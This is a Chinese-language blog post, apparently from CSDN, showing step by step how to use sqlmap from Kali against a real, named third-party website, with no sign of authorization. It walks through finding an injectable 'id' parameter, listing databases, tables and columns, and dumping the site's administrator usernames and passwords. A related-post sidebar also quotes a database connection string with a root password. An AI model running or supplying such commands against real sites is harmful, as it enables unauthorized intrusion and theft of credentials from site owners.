kali之sqlmap应用实战

最新推荐文章于 2024-07-15 15:39:35 发布
最新推荐文章于 2024-07-15 15:39:35 发布
阅读量6.3k 收藏 150
点赞数 26
分类专栏: web渗透 文章标签: kali
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_37422153/article/details/88934917
版权

前言

好久没有玩kali,都说kali玩的好,局子进的早,在各大神帖子下,今天打算用sqlmap来获取某个悲催网站的管理员账号和密码,www.bible-history.com这个就是传说中经常被攻击的网站,今天就拿它开刀。

实践

sqlmap工具通常都是用sql自动注入来获取网站管理员密码。输入https://www.bible-history.com/subcat.php这个网址跳转的网站界面如下:
网站图片输入https://www.bible-history.com/subcat.php?id=2,跳转到如下界面:
图片直接在网址后面添加?id=1(后面的数字可以改变),看看与原网页是否相同,如果不同,表示存在注入点,在添加?id=1后,我们发现网页变了。说明可以进行sql注入,来获取权限。这时,我们将存在注入漏洞的网址拿到sqlmap中进行跑一跑。
命令一:sqlmap -u “网址”
例如:root@kali:~# sqlmap -u “https://www.bible-history.com/subcat.php?id=2
在这里插入图片描述命令输入以后,回车运行。我这里用的是kali系统自带的sqlmap工具,sqlmap将会自动跑一段时间,测试网站的服务器和数据库,等待他跑完就行。如果中途有停顿需要你选择的,一直按Enter键就行,直到运行结束。结束以后,会给出该网站的数据库、操作系统、服务器等版本信息。
在这里插入图片描述这时,我们需要去查看该网站的当前数据库,命令二: sqlmap -u ” 网址 ” --dbs
例如: root@kali:~# sqlmap -u “https://www.bible-history.com/subcat.php?id=2” --dbs
在这里插入图片描述跑一段时间后,sqlmap把网站当前的数据库信息给出来
在这里插入图片描述命令三: sqlmap -u ” 网址 ” -D 数据库名 --tables 查看当前网站的数据库表
例如: root@kali:~# sqlmap -u “https://www.bible-history.com/subcat.php?id=2” -D bible_history --tables
在这里插入图片描述结果:
在这里插入图片描述当我们拿到表信息之后,就需要去查看表中包含的列信息。
命令四: sqlmap -u ” 网址 ” -D 数据库名 -T 表名 --columns
root@kali:~# sqlmap -u “https://www.bible-history.com/subcat.php?id=2” -D bible_history -T administrators --columns
在这里插入图片描述结果:
在这里插入图片描述表中字段明显拿到了,哈哈,去查看表中姓名和密码
使用命令:root@kali:~# sqlmap -u “http://www.bible-history.com/subcat.php?id=2” -D bible_history -T administrators -C admin_id,admin_username,admin_password --dump
在这里插入图片描述结果:
在这里插入图片描述成功获取管理员姓名和密码!!!!!

web小欣
关注
  • 26
    点赞
  • 150
    收藏
    觉得还不错? 一键收藏
  • 7
    评论
专栏目录
kali实战渗透
12-14
写的是kali实战渗透,其中有讲msf渗透,kali基础命令使用等等等,非常多
7.12、SQLmap—自动化渗透测试工具(kali linux)
qq_33782021的博客
01-16 1474
sglmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。
kali基于sqlmap的使用
ztK63LrD的博客
04-27 8827
kaliSQLmap
SQLMAP教程,零基础入门到精通,一篇就够了!
最新发布
程序员阿飘 的博客
07-15 659
这些选项可以用来创建用户自定义函数`--udf-inject 注入用户自定义函数`` ` `--shared-lib=SHLIB 共享库的本地路径`
kali工具sqlmap使用教程
qq_52805176的博客
07-13 3833
渗透测试工具sqlmap的简单使用
kali linux下sqlmap使用教程
龙卷风摧毁停车场
03-30 1万+
SQLMAP 有windows和linux两个版本使用,可跨系统进行操作,语法参数都相同,此处以kali linux为例进行操作 sqlmap --version 查看sqlmap版本 sqlmap -h 查看sqlmap帮助 sqlmap -hh 查看sqlmap高级帮助 使用sqlmap连接数据库 查看数据库banner信息 sqlmap -d "mysql://root:123456@47.208.229.216:3306/tiantianbao" -f --banner 查看数据库用户 sql
SQLmap使用教程图文教程(超详细)
热门推荐
wangyuxiang946的博客
06-20 4万+
SQLmap是一款自动化SQL注入工具,kali自带。路径 /usr/share/sqlmap 一、目标 1、指定url 2、指定文件(批量检测) 3、指定数据库/表/字段 4、post请求 5、cookie注入 二、脱库 1、获取数据库 2、获取表 3、获取字段 4、获取字段类型 5、获取值(数据) 6、获取用户 7、获取主机名 8、搜索库、表、字段。 9、正在执行的SQL语句 三、WAF绕过
如何在kali Linux中使用sqlmap工具
gaomei2009的专栏
06-20 1733
post请求中参数为 uname=admin*&passwd=test&submit=Submit。第一步:先判定kali Linux中sqlmap能够正常使用。在kali linux中,使用sqlmap,如上图。先遍历出数据库类型和所有的表。第二步:抓取某个页面的登陆数据包,如下。指定数据库表名sql10051008。
Kali渗透测试技术实战
07-24
第二章 下载并安装Kali Linux 硬盘最小120G,尤其是在密码破解、取证和做渗透测试项目的情况下,要求获得控制权限,大量生成数据、收集证据、生成日志和报告。 第三章 软件、补丁和升级 第四章 配置 kali 第五章渗透...
sql注入-注入漏洞获得数据库数据-kali-sqlmap-运维安全详细笔记
06-30
1. SQLMapSQLMap 是一个开源的 SQL 注入检测工具,可以自动检测 SQL 注入漏洞。 2. Burp Suite:Burp Suite 是一个 Web 应用安全检测工具,包含 SQL 注入检测功能。 六、总结 SQL 注入是一种常见的 Web 应用安全...
Kali Linux渗透测试实战
03-10
Kali Linux渗透测试实战 如果您之前使用过或者了解BackTrack系列Linux的话,那么我只需要简单的说,Kali是BackTrack的升级换代产品, 从Kali开始,BackTrack将成为历史。如果您没接触过BackTrack也没关系,我们从头...
kali渗透测试技术实战
02-21
这本书主要介绍了kali的一些工具使用方法,以及linux的一些基本操作
SQLmap使用教程图文教程(非常详细)从零基础入门到精通,看完这一篇就够了。
A_991128a的博客
09-07 1850
SQLmap是一款「自动化」SQL注入工具,kali自带。路径 /usr/share/sqlmap打开终端,输入sqlmap,出现以下界面,就说明SQLmap「可用」。1、检测「注入点」2、查看所有「数据库」3、查看当前使用的数据库4、查看「数据表」5、查看「字段」6、查看「数据」
sqlmapkali中的应用及ctfhub实战
2301_77004573的博客
07-08 1309
工具一把嗦固然方便,但仍不能忽视对原理的理解,毕竟常有sqlmap跑不出来的题目,为了检验自己对sql注入的掌握情况,之后也会补一篇手工注入的文章。
sqlmap详细教程
简介
01-04 3212
SQLmqp教程!
kali工具SQLmap基本使用方法流程以及命令解析
FRANXX_02的博客
10-06 5819
kali工具SQLmap基本使用方法流程以及命令解析
sqlmap 使用笔记(kali环境)
qq_40691438的博客
02-10 1786
sqlmap默认把session文件跟结果文件保存在output文件夹下,用此参数可自定义输出路径 例如:–当请求是HTTPS的时候,需要配合–force-ssl参数来使用,或者可以在Host头后面加上:443。在有些时候web服务器使用了伪静态,导致无法直接使用sqlmap测试参数,可以在想测试的参数后面加*用–os-shell参数也可以模拟一个真实的shell,可以输入你想执行的命令。输出的格式可定义为:CSV,HTML,SQLITE。参数:–os-cmd,–os-shell。文件内容直接copy。
kali 安装sqlmap
10-05
Kali Linux是一个专门用于渗透测试和安全评估的操作系统。要在Kali Linux上安装sqlmap,请按照以下步骤进行操作: 1. 打开终端,并输入以下命令以下载sqlmap的源代码:git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev 2. 进入/usr/share/目录,并检查是否存在先前安装的sqlmap目录。您可以使用以下命令查找:find / -name sqlmap 3. 如果找到了sqlmap目录,请删除它:sudo rm -rf /usr/share/sqlmap 4. 返回到下载的sqlmap目录:cd sqlmap-dev 5. 将sqlmap目录移动到/usr/share/目录下:sudo mv sqlmap-dev /usr/share/sqlmap 6. 确保/usr/share/sqlmap中的sqlmap.py文件具有执行权限。您可以使用以下命令更改权限:sudo chmod +x /usr/share/sqlmap/sqlmap.py 现在,您已经成功在Kali Linux上安装了sqlmap。您可以在终端中输入sqlmap -h来查看sqlmap的帮助信息。
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值